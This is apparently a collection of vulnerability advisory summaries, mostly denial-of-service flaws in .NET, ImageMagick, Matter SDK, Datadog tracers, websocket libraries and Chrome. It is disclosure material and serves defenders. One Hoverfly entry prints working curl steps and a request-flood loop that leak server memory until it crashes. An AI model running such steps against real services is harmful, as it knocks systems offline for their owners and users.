Network-based denial of service in Microsoft .NET 8.0, 9.0, and 10.0 allows an unauthenticated remote attacker to exhaust server resources and render applications unresponsive by exploiting uncontrolled resource allocation (CWE-770) in the runtime. The flaw carries CVSS 7.5 (availability-only impact) and affects the shared .NET runtime that underpins ASP.NET Core web services, so any internet-facing .NET workload is exposed. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; Microsoft has released a fix.
Denial of service in Microsoft .NET (versions 8.0, 9.0, and 10.0) and the legacy .NET Framework (3.5 through 4.8.1) allows a remote unauthenticated attacker to exhaust server resources over the network, causing availability loss. The flaw stems from missing limits or throttling on resource allocation (CWE-770), and Microsoft has released a patch via MSRC. There is no public exploit identified at time of analysis, and EPSS/KEV data were not supplied, so this appears to be a proactively patched issue rather than one under active exploitation.
Arbitrary file write in Anyquery Server Mode (versions < 0.4.5) allows unauthenticated remote attackers to write files to any path the process can access by abusing SQLite's native ATTACH DATABASE command exposed over the MySQL-compatible listener. Because the server blindly proxies SQL to the underlying SQLite engine, an attacker can create files such as cron jobs, PHP web shells, or SSH authorized_keys and escalate the file write into remote code execution or denial of service. A working step-by-step proof-of-concept is published in the vendor's GitHub Security Advisory (GHSA-xrcf-6jh3-ggvx); there is no CISA KEV entry and no confirmed in-the-wild exploitation at time of analysis.
Denial of service in Open5GS (open-source 5G/EPC core) through version 2.7.7 lets remote unauthenticated attackers crash the AMF by sending a malformed NAS 5GS mobile-identity information element, triggering a heap out-of-bounds read before authentication completes. Because the AMF handles mobility management for the entire network, a single crafted pre-authentication message can produce a subscriber-wide outage rather than affecting only the sender. There is no public exploit identified at time of analysis, and the flaw is not listed in CISA KEV, but the pre-auth network-reachable nature makes it a high-priority availability issue for anyone running Open5GS in production.
Heap buffer over-read in libsoup's HTTP/2 GOAWAY frame parser allows remote unauthenticated attackers to crash applications or leak heap memory fragments by sending a malformed frame with a non-NUL-terminated Additional Debug Data payload. Affected deployments include applications built on libsoup running on Red Hat Enterprise Linux 10 that accept or initiate HTTP/2 connections. A proof-of-concept exists per SSVC data, though exploitation is rated non-automatable and this vulnerability is not listed in the CISA KEV catalog at time of analysis.
Unauthenticated remote denial of service in StacklokLabs MKP (Model Context Protocol for Kubernetes) server versions before 0.4.1 lets a single crafted `tools/call` request against the default `:8080` endpoint exhaust process memory. The `get_resource` tool accepts attacker-controlled `limitBytes`/`tailLines` values with no upper bound and streams the entire Kubernetes pod-log response into an in-memory `bytes.Buffer`, driving an OOM kill (dynamic reproduction grew RSS from 25.8 MB to 1,179.3 MB on one request). Publicly available exploit code exists in the GitHub Security Advisory; there is no public evidence of active exploitation.
{ "actionName": "leak", "remote": "http://192.0.2.1:9999/blackhole", "delayInMs": 0 }' ``` **Step 3: Load a catch-all simulation** ```bash curl -X PUT http://localhost:8888/api/v2/simulation \ -H "Content-Type: application/json" \ -d '{ "data": { "pairs": [{ "request": {"path": [{"matcher": "glob", "value": "*"}]}, "response": {"status": 200, "body": "ok", "postServeAction": "leak"} }], "globalActions": {"delays": [], "delaysLogNormal": []} }, "meta": {"schemaVersion": "v5.2"} }' ``` **Step 4: Flood with requests** ```bash for i in $(seq 1 10000); do curl -s -x http://localhost:8500 "http://target.com/req${i}" & [ $((i % 100)) -eq 0 ] && wait done ``` **Verified memory impact on Hoverfly v1.12.7:** ``` Memory before: 20,064 KB Memory after 50 requests: 23,376 KB Memory increase: 3,312 KB (66 KB per goroutine) ``` At this rate: - 1,000 requests = ~64 MB leaked - 10,000 requests = ~640 MB leaked - 100,000 requests = ~6.4 GB leaked → OOM crash An attacker with access to the admin API (unauthenticated by default) can cause a complete denial of service by: 1. Registering a remote post-serve action pointing to a non-responsive endpoint. 2. Loading a catch-all simulation that triggers the action on every request. 3. Sending proxy traffic, each request permanently leaks a goroutine and its associated memory.
Denial of service in Hoverfly's Diff mode (versions ≤ 1.12.7) lets any client with proxy access crash the entire process by sending concurrent requests. The `AddDiff()` function writes to the shared `responsesDiff` map without a mutex, so simultaneous proxy requests - the normal case for a proxy - trigger Go's built-in concurrent-map detector, producing an unrecoverable `fatal error: concurrent map read and map write` that kills the process. Publicly available exploit code exists (a working POC is embedded in the GitHub advisory), though there is no public exploit identified as actively used in the wild and no KEV listing.
Insufficient Parameter Validation in the SchedGet() system call could allow an attacker with local access to cause a crash of the QNX Neutrino kernel.
Local privilege escalation in the Microsoft Windows Client-Side Caching (CSC) Service, driven by a use-after-free (CWE-416) memory-corruption flaw affecting Windows 10 (1607 through 22H2), Windows 11 (24H2/25H2/26H1), and Windows Server 2012 through 2025. An authorized attacker who already holds low-level privileges (PR:L) on the host can trigger the freed-object reuse to gain elevated, likely SYSTEM-level, privileges. The issue was reported by Microsoft with a patch available; there is no public exploit identified at time of analysis and no CISA KEV listing.
Local privilege escalation in the Windows 11 (version 26H1) Desktop Window Manager (DWM) allows an authenticated low-privileged user to gain SYSTEM-level control by exploiting a use-after-free (CWE-416) memory-corruption flaw. Reported by Microsoft and carrying a CVSS 3.1 score of 7.8, the flaw grants full confidentiality, integrity, and availability impact once triggered locally. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV, but DWM EoP bugs are a historically favored post-compromise primitive.
Local privilege escalation in the Desktop Window Manager (DWM) component of Windows 11 version 26H1 allows an authenticated local attacker to elevate to SYSTEM by triggering a use-after-free memory corruption condition. The CVSS 3.1 vector (AV:L/PR:L) confirms an already-authenticated low-privileged user is required, and full compromise of confidentiality, integrity, and availability follows successful exploitation. Microsoft has released a patch; there is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV.
Local privilege escalation in the Windows Win32K kernel-mode subsystem allows an authenticated attacker to elevate to SYSTEM by exploiting a use-after-free (CWE-416) memory-corruption condition. The flaw affects a broad range of supported Windows client and server releases (Windows 10 1607 through Windows 11 26H1, and Windows Server 2016 through 2025). Reported by Microsoft with a patch available; there is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Remote unauthenticated Denial of Service in the Datadog.Trace .NET tracing library (versions before 3.43.0) arises because W3C baggage HTTP headers are parsed on the extract path without enforcing the DD_TRACE_BAGGAGE_MAX_ITEMS (default 64) or DD_TRACE_BAGGAGE_MAX_BYTES (default 8192) limits that are only applied during injection. An attacker can send a single request with a baggage header containing an arbitrarily large number of comma-separated key-value pairs, forcing the tracer to allocate a hash-map entry per pair and exhausting CPU and memory. Because the baggage propagation style is enabled by default, any internet-facing service instrumented with an affected tracer is exposed; there is no public exploit identified at time of analysis and the CVSS is 7.5 (A:H only).
Remote unauthenticated Denial of Service in the Datadog dd-trace-js Node.js tracing library (versions < 5.100.0) allows attackers to exhaust CPU and memory by sending an HTTP request with an oversized W3C 'baggage' header. Because the DD_TRACE_BAGGAGE_MAX_ITEMS (64) and DD_TRACE_BAGGAGE_MAX_BYTES (8192) caps were enforced only on injection and not on the extraction path, the tracer allocates a hash-map entry per comma-separated pair on every request. With baggage propagation enabled by default, any internet-facing instrumented service is exposed. CVSS 3.1 base score is 7.5 (A:H); there is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Remote denial of service in Datadog's dd-trace-py Python tracing library (versions before 4.8.2) lets unauthenticated attackers exhaust CPU and memory by sending oversized W3C 'baggage' HTTP headers. The DD_TRACE_BAGGAGE_MAX_ITEMS (64) and DD_TRACE_BAGGAGE_MAX_BYTES (8192) safeguards were enforced only on baggage injection, never on extraction, so a single crafted request with a huge number of comma-separated pairs forces the tracer to allocate a hash-map entry per pair on every request. Because the baggage propagation style is enabled by default, any reachable service instrumented with an affected tracer is exposed; no public exploit identified at time of analysis.
Remote denial of service in Datadog's dd-trace-java (dd-java-agent) tracing library affects any HTTP service instrumented with a version below 1.62.0 that has W3C baggage propagation enabled, which is the default. Because the DD_TRACE_BAGGAGE_MAX_ITEMS (64) and DD_TRACE_BAGGAGE_MAX_BYTES (8192) caps were enforced only on baggage injection and not on extraction, a remote unauthenticated attacker can send a single crafted 'baggage' header with a huge number of key-value pairs or one oversized value to exhaust CPU and memory. There is no public exploit identified at time of analysis and it is not on CISA KEV, but exploitation is trivially reliable (CVSS 7.5, AV:N/AC:L/PR:N).
Resource limit bypass in the websocket-driver npm library (versions < 0.7.5) allows WebSocket messages to exceed the application's configured maximum message size when the permessage-deflate compression extension is active. The size enforcement is applied to compressed frame length headers rather than the decompressed payload, meaning a highly compressed message can appear within limits on the wire but expand arbitrarily upon decompression. Vendor-released patch is available in version 0.7.5; no public exploit has been identified at time of analysis.
Memory exhaustion in the websocket-driver Ruby gem (versions prior to 0.8.1) allows a remote peer to crash or degrade a receiving process by sending an HTTP request or response with an arbitrarily large number of headers, which the parser accumulates without any size bound. Affected deployments are those using WebSocket::Driver.server() directly atop a raw TCP server (bypassing an HTTP framework), or applications using this library as a WebSocket client - standard HTTP framework integrations (Rails, Sinatra, Rack) are not in scope. No public exploit has been identified and the vulnerability is not listed in CISA KEV, but exploitation is mechanically trivial once a vulnerable deployment is identified, requiring only a crafted HTTP connection.
Resource exhaustion in the websocket-driver Ruby gem (faye/websocket-driver-ruby) allows any WebSocket peer to bypass a configured maximum message size when the permessage-deflate compression extension is in use. The size limit is enforced against the compressed frame length rather than the post-decompression size, enabling a decompression-bomb style attack where a small compressed payload expands far beyond the intended ceiling. Applications on versions below 0.8.1 silently accept oversized payloads, potentially exhausting server memory or CPU and causing a denial-of-service condition. No public exploit exists at time of analysis, but the attack class is well understood and low-complexity to implement.
Memory exhaustion in the Ruby websocket-driver gem (faye/websocket-driver-ruby) allows any network peer to crash the host process by abusing the draft WebSocket protocol's variable-length integer encoding. By streaming an indefinite sequence of bytes with values 0x80 or above in a frame length header, an attacker forces the parser to accumulate an ever-growing Ruby arbitrary-precision integer, consuming unbounded heap memory until the process is killed by the OS. The attack is bidirectional - a malicious server can target a client, or a malicious client can target a server - and no public exploit has been identified at time of analysis.
Arbitrary file read and denial of service in Wekan (open-source Meteor kanban board) before version 9.31 allows an authenticated board member to read any file the server process can access by supplying attacker-controlled versions.original.path and versions.original.storage values to the /attachments/insert DDP method. Because the server-side insert permission rule only validates board write access and the filesystem store never confirms the path stays within the storage root, a low-privileged user can exfiltrate sensitive host files or hang the process by pointing at special files like /dev/zero. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV, but a fixing commit and release (v9.31) are public.
Resource exhaustion in Absolute Security Secure Access publisher (versions prior to 14.55) enables authenticated remote attackers holding valid tunnel credentials to trigger a non-persistent denial of service against the publisher component. The CVSS 4.0 score of 5.1 (Medium) reflects the constrained impact: availability loss is limited and self-recovering, with no confidentiality or integrity exposure. No public exploit code and no CISA KEV listing identified at time of analysis.
Heap overflow in Absolute Security Secure Access client certificate parsing causes a local denial of service. Versions prior to 14.55 are affected. An attacker who already holds local administrator privileges on a managed endpoint can trigger the overflow to crash the Secure Access client, effectively disabling it on that machine. No public exploit code has been identified, and this vulnerability is not listed in the CISA KEV catalog.
Stack-based buffer overflow in TDengine (open-source IoT time-series database) versions 3.4.1.6 and earlier allows an authenticated user to trigger a one-byte out-of-bounds write by submitting SQL containing crafted escape sequences (\%, \_, or \x), leading to denial of service and potentially remote code execution. The flaw sits in the SQL parser's trimString() routine, which validates only a single byte of remaining space in the tmpTokenBuf stack buffer before writing escape-processed data. There is no public exploit identified at time of analysis, and the issue is not listed in CISA KEV; it is fixed in version 3.4.1.14.
Denial of service in the Elixir/Erlang Hex package protobuf (>= 0.8.0, < 0.16.1) allows an unauthenticated remote attacker to crash any service that decodes untrusted protobuf messages into a self-referential or cyclic message type. Because Protobuf.Decoder performs unbounded, non-tail recursion over embedded message fields, a small request body (a few KB to a few MB) can nest a field hundreds of thousands to millions of levels deep, forcing the BEAM to retain one stack/heap frame per level until it exhausts memory and pins a scheduler; a handful of concurrent requests take the node offline. This is a request-amplification DoS with a publicly available proof-of-concept, but no CISA KEV listing and no evidence of active exploitation; no CVSS or EPSS score is provided in the source data.
Out-of-bounds write in the Zephyr RTOS ADIN2111/ADIN1110 single-pair Ethernet driver (eth_adin2111.c) lets an attacker on the same 10BASE-T1S/T1L segment corrupt kernel memory by sending an oversized frame in OPEN Alliance SPI mode. Because per-chunk length and chunk count (up to 255) come straight off the wire with no bounds check on the reassembly cursor, the RX offload thread writes attacker-controlled bytes-up to ~14.8 KB-past the fixed 1524-byte static buffer, enabling denial of service and potentially remote code execution. There is no public exploit identified at time of analysis; the flaw was introduced in commit 0ca8b0756b1 and shipped in v3.7.0 through v4.4.0.
Denial of service in the ws WebSocket library for Node.js (versions before 8.21.1) allows remote unauthenticated attackers to exhaust server heap memory by opening fragmented messages that are never completed. Because the fragment guard in lib/receiver.js only fires when the fragment count reaches maxFragments, an attacker can stream continuation frames (starting with a text frame carrying FIN=0) indefinitely, and each fragment is retained as a separate Buffer with per-object overhead until the process runs out of memory. No public exploit has been identified at time of analysis, and the flaw was disclosed by VulnCheck with a vendor patch already available.
Denial of service in F5 NGINX Ingress Controller allows an authenticated remote attacker holding write access to Ingress or TransportServer resources to crash the control plane by submitting a malformed resource. Because the offending resource persists in the cluster, the controller re-reads it and re-crashes, producing a durable crash loop rather than a one-time outage. There is no public exploit identified at time of analysis, and impact is confined to the control plane with no data plane or confidentiality/integrity exposure.
Memory-exhaustion denial of service in F5 BIG-IP affects any virtual server configured with an HTTP/2 profile, where a remote unauthenticated attacker sends undisclosed crafted requests that drive Traffic Management Microkernel (TMM) memory consumption upward until TMM restarts. This is a data-plane-only issue with no control-plane exposure, and it also impacts the BIG-IP Next family (Kubernetes, SPK, CNF). No public exploit has been identified at time of analysis, and it is not listed in CISA KEV; the vendor rates it CVSS 4.0 8.7 (High).
Unvalidated chown in Samba's pam_winbind module allows a local user with narrow sudo delegation to transfer ownership of the root filesystem directory to a system account, causing system-wide denial of service on Red Hat Enterprise Linux 6 through 10. When mkhomedir is enabled and a system account has its home directory set to '/', any PAM-triggered authentication event run as that account via sudo invokes the chown without path sanitization. The resulting ownership change breaks SSH, sudo, and package-manager functionality, though the 0555 permissions on RHEL prevent write access escalation, confining the impact to high-severity availability loss. No public exploit or CISA KEV listing is identified at time of analysis.
Memory leak in ImageMagick's ICON decoder exposes services that process user-supplied images to a potential denial of service. Both the 7.x and 6.x release branches are affected - specifically versions before 7.1.2-26 and 6.9.13-51 respectively. An unauthenticated remote attacker (per CVSS PR:N) who can supply a crafted ICON file to an ImageMagick-processing endpoint can repeatedly trigger allocation failures that are never cleaned up, gradually exhausting process memory. No public exploit or active exploitation has been identified at time of analysis.
Memory leak in ImageMagick's MIFF encoder (CWE-401) affects the 7.x branch before 7.1.2-26 and the 6.x branch before 6.9.13-51, enabling denial of service through resource exhaustion. When a memory allocation fails during MIFF image encoding, previously allocated buffers are not released, causing memory to accumulate across repeated processing calls. The CVSS 4.0 score of 2.1 and a local attack vector (AV:L) with high complexity (AC:H) and specific prerequisites (AT:P) signal a low-priority finding with no public exploit and no CISA KEV listing.
Memory leak in ImageMagick's YUV decoder (versions before 7.1.2-26 and 6.9.x before 6.9.13-51) enables remote denial of service by repeatedly submitting malformed YUV images that trigger a failed blob open, leaking heap memory on each decode attempt. No confidentiality or integrity impact applies; exposure is limited to availability of image-processing services that accept untrusted input. No public exploit code or active exploitation has been identified at time of analysis.
Memory leak in ImageMagick's TIFF encoder before version 7.1.2-26 enables denial of service via controlled memory allocation failures. An attacker who can submit TIFF images for processing can repeatedly trigger allocation failures, causing the encoder to leak memory without releasing it, ultimately exhausting available system memory. No public exploit has been identified at time of analysis, and the CVSS 4.0 score of 2.1 reflects the constrained local attack vector and low availability impact.
Memory leak in ImageMagick's JNG encoder before version 7.1.2-26 enables local resource exhaustion when malformed JNG files cause blob open failures without subsequent memory release. The flaw is classified CWE-401 and carries a CVSS 4.0 score of just 2.1, reflecting a local attack vector, high complexity, and availability-only impact - no confidentiality or integrity loss is possible. No public exploit code and no active exploitation (CISA KEV) have been identified, making this a low-priority finding relevant primarily to services that batch-process untrusted image files.
Use-after-free in ImageMagick's FreeType integration path allows remote denial of service against image processing pipelines using vulnerable 6.x or 7.x releases. When FreeType initialization fails during an image processing operation, the affected code path neglects to exit cleanly and continues referencing already-freed memory, causing process corruption or crash. No public exploit identified at time of analysis; the CVSS 4.0 score of 6.3 with AC:H and AT:P reflects meaningful preconditions required to trigger the failure path.
Heap-based buffer over-write in ImageMagick's X11 import functionality exposes local systems to heap memory corruption and denial of service when processing a crafted X11 window title. Affected versions span both the 7.x branch (before 7.1.2-26) and the legacy 6.x branch (before 6.9.13-51), covering a large installed base across Linux and Unix environments. No public exploit identified at time of analysis, and the narrow exploitation conditions - requiring local privileged access with X11 in scope - significantly constrain real-world risk despite the CWE-122 heap overflow class.
Memory exhaustion denial of service in ImageMagick through 7.1.2-18 arises from the ASHLAR coder failing to release a temporary image object when an internal action fails, allowing an attacker who can supply malicious ASHLAR files to a processing pipeline to cumulatively exhaust process memory. The CVSS 4.0 vector (AV:L/UI:P) confirms this is a local-vector attack requiring passive user or pipeline interaction to process the crafted file, not a remote unauthenticated scenario. No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV; confirmed fixed versions exist for Magick.NET NuGet packages at 14.11.1.
Denial of service in Red Hat OpenShift GitOps (Argo CD operator) lets a tenant who controls a namespace-scoped Argo CD instance delete a ClusterRole belonging to a cluster-scoped Argo CD instance by crafting a name collision. Because the ClusterRole reconciler skips ownership validation (CWE-862), a low-privileged tenant can disrupt a higher-privileged, cluster-wide GitOps instance across the trust boundary. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the cross-tenant scope change makes it a meaningful multi-tenancy integrity concern.
SQL injection in Apache Fineract's Office Search API (GET /api/v1/offices) in all versions up to and including 1.14.0 lets an authenticated user who holds the office-view permission inject arbitrary SQL through the orderBy request parameter. Because it bypasses the ColumnValidator hardening added for CVE-2024-32838, an attacker can run time-based blind SQL injection to exfiltrate database contents and, by launching concurrent injections that hold connections open, exhaust the database connection pool to cause denial of service. No public exploit identified at time of analysis; the flaw is documented via an oss-security advisory and an upstream fix pull request (apache/fineract #6048).
Local information disclosure and denial of service in the ASUS System Control Interface driver (v3 and earlier) and ASUS Business Manager lets a user already holding local administrator rights issue crafted IOCTL requests to read leftover sensitive data from kernel/driver buffers and, in severe cases, exhaust unthrottled resources to crash the host. The flaw stems from missing resource limits (CWE-770) combined with reuse of memory that still contains prior sensitive contents. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV; ASUS self-reported and issued an advisory.
A stack overflow in the evaluate() function (editors/awk.c) of BusyBox commit 371fe9 allows attackers to cause a Denial of Service (DoS) via supplying a crafted AWK script.
A heap overflow in the evalcommand() function (shell/ash.c) of Busybox v1.38.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input.
An issue in EMQ NanoMQ v.0.24.9 allows a remote attacker to cause a denial of service via the nni_qos_db_set function in broker_tcp.c component
A use-after-free in the awk_sub() function (editors/awk.c) of Busybox v1.38.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted AWK script.
Buffer Overflow vulnerability in Tenda AC10 v3 (firmware V03.03.16.09) allows attackers to cause a permanent Denial of Service (DoS) or potentially execute remote code via the /cgi-bin/UploadCfg endpoint
A heap overflow in the ifsbreakup() function (shell/ash.c) of Busybox v1.38.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input.
Incorrect access control in CAXPerts UniversalPlantViewer WebServices Server v2.7.6 allows any authenticated low-privilege user to invoke the /api/License/deactivateOffline endpoint and strip the server's license, rendering the service inoperable. The flaw (CWE-284) grants low-privileged accounts an action that should be restricted to administrative roles, providing a trivial denial-of-service primitive against industrial plant visualization infrastructure. No public exploit identified at time of analysis, though a researcher disclosure post on Medium appears to document the discovery.
Denial of service in the Matter SDK (connectedhomeip) before 1.4.0 lets a network attacker crash the device by sending an InvokeCommandRequest to a nonexistent endpoint/cluster (e.g. 0x34), which the interaction model treats as valid and then aborts on a VerifyOrDie assertion (SIGABRT). This is a reachable-assertion bug (CWE-617) with availability-only impact and no data compromise. No public exploit has been identified at time of analysis, and it is not listed in CISA KEV; the issue was acknowledged upstream and fixed in PR #37207.
Denial of service in the Matter SDK (connectedhomeip) before version 1.4.0 allows remote attackers to crash a Matter device or controller by sending a groupcast InvokeCommand message without an initialized destination group ID. The ExchangeManager reads the optional GroupId via GetDestinationGroupId().Value() without a HasValue() guard (CWE-457), triggering a SIGABRT abort. An upstream fix exists (commit 0360cc3, PR #36729), and no public exploit has been identified at time of analysis; this is a network-reachable, unauthenticated availability issue with no confidentiality or integrity impact.
Denial of service in the Matter SDK (connectedhomeip) before 1.4.0 lets a remote unauthenticated attacker crash a smart-home device by sending a crafted read request. The flaw lives in the ReadRevisionAttribute function, which is reused across multiple clusters (Channel, Account Login, TargetNavigator), so any device exposing those clusters is affected. No public exploit identified at time of analysis, and the issue is availability-only (no code execution or data exposure).
Remotely triggerable denial of service in the Matter SDK (connectedhomeip) before 1.4.2 lets an attacker crash devices by driving the Level Control cluster's periodic server tick into a failed assertion (currentLevel < maxLevel). Sending a MoveToLevel command and immediately writing OperationMode=2 in the Pump Configuration and Control cluster produces an inconsistent internal state that aborts the process. No public exploit has been identified at time of analysis, and the flaw is not listed in CISA KEV; CVSS is 7.5 with availability-only impact.
CAI Content Credentials is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Integer Overflow or Wraparound vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Improper Input Validation vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Improper Input Validation vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Improper Input Validation vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
Twig is a template language for PHP. Prior to 3.26.0, the Twig sandbox does not prevent a template from consuming CPU, memory, or wall-clock time, even under the strictest allow-list, allowing untrusted templates to cause resource exhaustion. This issue is addressed in version 3.26.0 by documenting that the sandbox does not protect against resource exhaustion.
Remote denial of service in the Matter SDK (connectedhomeip) versions 1.3 through 1.4 lets unauthenticated attackers crash smart-home devices by racing a Level Control MoveToLevel command against a conflicting write to the Pump Configuration and Control cluster's OperationMode attribute, tripping a reachable assertion (minLevel < currentLevel) in the server tick callback. The abort forces the device to restart or hang, disrupting any product built on the affected SDK. No public exploit identified at time of analysis, and the issue is tracked via project-chip GitHub issue #38619 with no vendor-released patch identified.
When OIDC is enabled, `GET /ui/oidc/login` is reachable without authentication and is registered outside the Web UI rate-limited auth routes. Every request creates a fresh random OIDC state value and stores it in an in-memory map for `10m`. Expired states are swept lazily, but there is no rate limit or maximum live-state cap on the allocation path. An unauthenticated remote client can therefore grow `OIDC.states` for the full state TTL, bounded by request throughput rather than by configured auth rate limits. The OIDC login route is registered directly by `WithOIDC`: - `internal/web/web.go:153` registers `w.router.Get("/ui/oidc/login", o.HandleLogin)`. - `internal/web/web.go:154` rate-limits only `GET /ui/oidc/callback` with `w.rateLimitMiddleware("auth")`. The normal `/ui/*` route group applies rate limiting to login/register form submissions, but this direct registration happens outside that group: - `internal/web/web.go:287` through `internal/web/web.go:292` show the rate-limited local login, TOTP, and register POST routes. The OIDC login handler allocates persistent server-side state before redirecting to the configured identity provider: - `internal/web/oidc.go:105` defines `HandleLogin`. - `internal/web/oidc.go:106` creates a random state token. - `internal/web/oidc.go:112` calls `o.rememberState(state)`. - `internal/web/oidc.go:122` redirects to `o.oauth.AuthCodeURL(state)`. The state storage has a TTL but no maximum size: - `internal/web/oidc.go:24` through `internal/web/oidc.go:26` define `oidcStateTTL = 10 * time.Minute`. - `internal/web/oidc.go:353` through `internal/web/oidc.go:358` sweep expired states and then add the new state to `o.states`. - `internal/web/oidc.go:360` through `internal/web/oidc.go:373` delete only expired states. Because the route is unauthenticated and not rate-limited, a remote client can repeatedly request `/ui/oidc/login` and force live state entries to accumulate for ten minutes. OIDC must be enabled for exposure. No IdP callback, valid credentials, or user interaction is required to trigger the allocation. Affected version evidence: OIDC login support was introduced by commit `3f46685` (`feat(auth): add OIDC operator login (Keycloak/Authentik/Okta/...) (#24)`), and `git tag --contains 3f46685 --sort=version:refname` returns `v0.2.0` and every later release through `v0.3.8`. Pattern checks across all release tags showed the OIDC login route and state allocation are present in `v0.2.0` and in every `v0.3.x` release from `v0.3.0` to `v0.3.8`, and absent from `v0.1.x`. The current checkout at commit `d92dd9a60de291e2bc1caf73b4e9a99567b31ec0` (`git describe`: `v0.3.8-1-gd92dd9a`) remains affected. Safe local PoC run from a clean checkout at commit `d92dd9a60de291e2bc1caf73b4e9a99567b31ec0` on 2026-06-12. The PoC is a temporary Go test that uses `httptest` and an in-memory OIDC object; it does not start a real server, does not contact an IdP, and uses 1000 requests only to demonstrate linear state growth. 1. Create a temporary test file `internal/web/security_audit_poc_test.go` in package `web`. 2. Create a test Web UI with `newTestWeb(t)`. 3. Install a deliberately tiny auth rate limiter: group `auth` with rate `0.001` and burst `2`. 4. Attach an `OIDC` instance with an empty `states` map and an `oauth2.Config` whose authorization endpoint is `https://idp.example.test/auth`. 5. Send 1000 unauthenticated `GET /ui/oidc/login` requests from the same `RemoteAddr` through `w.ServeHTTP`. 6. Assert no request returns `429 Too Many Requests`, then inspect `o.stateCount()`. Command run: ```bash go test ./internal/web -run 'TestSecurityAuditPOC' -count=1 -v ``` Observed vulnerable output from this environment: ```text === RUN TestSecurityAuditPOC_OIDCLoginAllocatesUnrateLimitedState POC_OIDC_STATE_GROWTH attempts=1000 live_states=1000 ttl=10m0s rate_limit_group=auth_burst_2 --- PASS: TestSecurityAuditPOC_OIDCLoginAllocatesUnrateLimitedState (0.10s) ``` The meaningful control is that local login/register/TOTP POST routes and the OIDC callback are rate-limited: `internal/web/web.go:287` through `internal/web/web.go:292` and `internal/web/web.go:154`. The PoC specifically shows the OIDC login allocation route does not share that protection. After recording the output, the temporary test file was removed and `git status --short` returned clean. The PoC was re-run after drafting this report and produced the output shown above. In deployments with OIDC enabled, an unauthenticated remote client can cause application-layer memory growth by repeatedly requesting `/ui/oidc/login`. Each request stores a new state entry for ten minutes, and the growth is not bounded by the configured auth rate limiter or by a maximum map size. The demonstrated impact is availability degradation risk through retained in-memory state growth. The PoC used 1000 local requests to avoid disruptive load while proving the source-to-sink behavior (`1000` requests resulted in `1000` live states). Suggested remediation: apply the existing `auth` rate limiter to `GET /ui/oidc/login`, add a maximum number of live OIDC states per client and/or globally, and fail closed when the cap is reached. Add a regression test that attaches a low-burst auth limiter, sends repeated `GET /ui/oidc/login` requests from the same client, and expects `429` or bounded live-state count after the configured burst.
Denial of service in the Netty netty-codec-stomp module (versions 4.1.x up to 4.1.135.Final and 4.2.0.Alpha1 through 4.2.15.Final) allows a remote attacker to trigger an OutOfMemoryError and crash the JVM. The StompSubframeDecoder caps individual header line length via maxLineLength but never bounds the total header count or cumulative header size, so a single STOMP frame packed with thousands of short headers exhausts heap memory. Publicly available exploit code exists (a working client/server PoC is published in the GitHub Security Advisory), but there is no public evidence of active exploitation; EPSS/KEV signals are not present in the input.
Use after free in UI in Google Chrome on Linux prior to 150.0.7871.125 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
Use after free in Skia in Google Chrome prior to 150.0.7871.125 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in Core in Google Chrome on Windows prior to 150.0.7871.125 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in GPU in Google Chrome on Android prior to 150.0.7871.125 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in Ozone in Google Chrome prior to 150.0.7871.125 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)
Use after free in Ozone in Google Chrome on Linux prior to 150.0.7871.125 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)
NVIDIA TensorRT-LLM contains a vulnerability in the OpenAI-compatible inference API, where an attacker could cause allocation of GPU resources without limits or throttling. A successful exploit of this vulnerability might lead to denial of service.
NVIDIA TensorRT-LLM contains a vulnerability in the OpenAI-compatible inference API where an attacker could trigger a reachable assertion in the sampler thread. A successful exploit of this vulnerability might lead to denial of service.
NVIDIA TensorRT-LLM for any platform contains a vulnerability in the gRPC server chat API endpoint, where an attacker could cause CWE-20 by local attack. A successful exploit of this vulnerability might lead to denial of service.
NVIDIA TensorRT-LLM for Linux contains a vulnerability in the multimodal media fetching functions, where a network-accessible attacker could cause server-side request forgery. A successful exploit of this vulnerability might lead to denial of service and information disclosure.
